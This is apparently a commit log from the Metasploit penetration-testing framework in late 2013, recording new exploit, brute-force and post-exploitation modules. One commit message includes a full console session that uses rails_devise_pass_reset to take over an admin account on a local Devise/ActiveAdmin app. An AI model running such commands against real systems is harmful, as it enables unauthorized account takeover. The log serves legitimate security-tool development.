55847ce074
Fixup for release
...
Notably, adds a description for the module landed in #2709 .
2013-12-02 16:19:05 -06:00
19293d89dd
Land #2704 - rm script launcher and fix file_exists?
2013-12-02 15:05:01 -06:00
44e37f1b98
Improved meterpreter compatibility
2013-12-02 21:43:58 +01:00
20e0a7dcfb
Land #2709 - ZyXEL GS1510-16 Password Extractor
2013-12-02 13:13:01 -06:00
39fbb59ba9
re-added the reference I accidentally deleted
2013-12-02 19:06:19 +01:00
cb98d68e47
added @wchen-r7's code to store the password into the database
2013-12-02 18:35:59 +01:00
ba39a8e826
Land #2705 , @jjarmoc's user object configuration on rails_devise_pass_reset
2013-12-02 11:04:29 -06:00
bd5113c477
Land #2710 - Cisco Prime Data Center Network Manager Arbitrary File Upload
2013-12-02 11:01:53 -06:00
7e379376dc
Land #2635 , @peto01 and @jvennix-r7's osx post module to manage volumes
2013-12-02 09:22:23 -06:00
cc2b7950bf
Do minor cleanup to mount_share
2013-12-02 09:21:36 -06:00
d18d30a35e
Land #2706 , @wchen-r7's enum_tomcat description update
2013-12-02 09:01:53 -06:00
8d6a534582
Change title
2013-12-02 08:54:37 -06:00
24d09f2085
Land #2700 , @juushya's Oracle ILO Brute Forcer login
2013-12-02 08:53:10 -06:00
41f8a34683
Use attempts
2013-12-02 08:43:22 -06:00
433d21730e
Add ATTEMPTS option
2013-12-02 08:42:25 -06:00
040a629f34
Kill meterpreter support.
...
* Meterpreter seems to fall over on the cmd escaping, and dies if you
try to pass it an array of args (python/java meterpreter on various versions
of osx).
2013-12-01 20:17:43 -06:00
2de9a4f3c1
Add support for 10.5 shares.
2013-12-01 20:13:54 -06:00
b9192c64aa
Fix @wchen-r7's feedback
2013-12-01 19:55:53 -06:00
8e73023baa
and now in the correct data structure
2013-12-01 17:38:35 +01:00
ef77b7fbbf
added reference as requested at https://github.com/rapid7/metasploit-framework/pull/2709
2013-12-01 17:36:15 +01:00
3417c4442a
Make check really better
2013-11-30 09:47:34 -06:00
749e6bd65b
Do better check method
2013-11-30 09:46:22 -06:00
0a7c0eea78
Fix references
2013-11-29 23:13:07 -06:00
691d47f3a3
Add module for ZDI-13-255
2013-11-29 23:11:44 -06:00
aa62800184
added ZyXEL GS1510-16 Password Extractor
2013-11-29 10:42:17 +01:00
bc41120b75
Updated
2013-11-29 12:47:47 +05:30
8817c0eee0
Change description a bit
...
Try to make this sound smoother
2013-11-28 12:19:42 -06:00
807e2dfd31
Fix title
2013-11-28 10:53:12 -06:00
7dee4ffd4d
Add module for ZDI-13-270
2013-11-28 10:47:04 -06:00
1109a1d157
Updated
2013-11-28 11:30:02 +05:30
03838aaa79
Update rails_devise_pass_reset.rb
...
Fixed erroneous status if FLUSHTOKENS is false.
2013-11-27 22:27:45 -06:00
a8af050c16
Update post module Apache Tomcat description
...
This module's description needs to be more descriptive, otherwise
you kind of have to pull the source code to see what it actually
does for you.
2013-11-27 19:21:27 -06:00
a02e0ee3e4
Land #2682 - Kimai v0.9.2 'db_restore.php' SQL Injection
2013-11-27 19:10:44 -06:00
7f8baf979d
Adds the ability to configure object name in URI and XML. This allows exploiting other platforms that include devise.
...
For example, activeadmin is exploitable if running a vulnerable devise and rails version with the following settings;
msf > use auxiliary/admin/http/rails_devise_pass_reset
msf auxiliary(rails_devise_pass_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(rails_devise_pass_reset) > set RPORT 3000
RPORT => 3000
msf auxiliary(rails_devise_pass_reset) > set TARGETEMAIL admin@example.com
TARGETEMAIL => admin@example.com
msf auxiliary(rails_devise_pass_reset) > set TARGETURI /admin/password
TARGETURI => /admin/password
msf auxiliary(rails_devise_pass_reset) > set PASSWORD msf_pwnd
PASSWORD => msf_pwnd
msf auxiliary(rails_devise_pass_reset) > set OBJECTNAME admin_user
OBJECTNAME => admin_user
msf auxiliary(rails_devise_pass_reset) > exploit
[*] Clearing existing tokens...
[*] Generating reset token for admin@example.com ...
[+] Reset token generated successfully
[*] Resetting password to "msf_pwnd"...
[+] Password reset worked successfully
[*] Auxiliary module execution completed
msf auxiliary(rails_devise_pass_reset) >
2013-11-27 15:35:43 -06:00
95a98529c4
Removed script launcher wrapper and fixed the file_exists so that the module now detects input
2013-11-27 21:38:20 +01:00
6c8df4be27
Land #2699 , @wvu fix for Linux download_exec post module
2013-11-27 10:22:35 -06:00
6561f149a8
DRY up URL_REGEX constant.
2013-11-27 06:16:25 -06:00
b0416b802d
Change the Recent shares implementation.
...
* Allows us to see protocol of Recent Shares
* Parses protocol from file share URL
2013-11-27 06:08:48 -06:00
e876155e1a
More tweaks to mount_share.
...
* Adds some docs to some of the methods to further distinguish
the separate sets of shares.
2013-11-27 05:45:46 -06:00
485e38ebca
Some code tweaks to post/osx/mount_share.
...
* Make PROTOCOL an Enum
* Move path override options to advanced section
* More Enumerable rework
* Move one-off regexes back to inline, pull out protocol list
2013-11-27 05:22:12 -06:00
f3e71c2c9d
Be more specific
...
Perl!
2013-11-27 01:03:41 -06:00
b202b98a42
Anchor the scheme
2013-11-27 00:57:45 -06:00
e8da97aa17
Fix extraneous use of which and cmdsub
...
I don't even.
2013-11-27 00:43:07 -06:00
288476441f
Fix improper use of expand_path
...
I don't even.
2013-11-27 00:42:09 -06:00
5d10b44430
Add support for Silverlight
...
Add support for Silverlight exploitation. [SeeRM #8705 ]
2013-11-26 14:47:27 -06:00
a914fbc400
Land #2693 - case sensitive
2013-11-26 11:16:57 -06:00
671c0d9473
Fix nokogiri typo
...
[SeeRM #8730 ]
2013-11-26 10:54:31 -06:00
253719d70c
Fix title
2013-11-26 08:11:29 -06:00
f1c5ab95bf
Land #2690 - typo
2013-11-25 23:53:34 -06:00
70139d05ea
Fix missed title
2013-11-25 22:46:35 -06:00
Tod Beardsley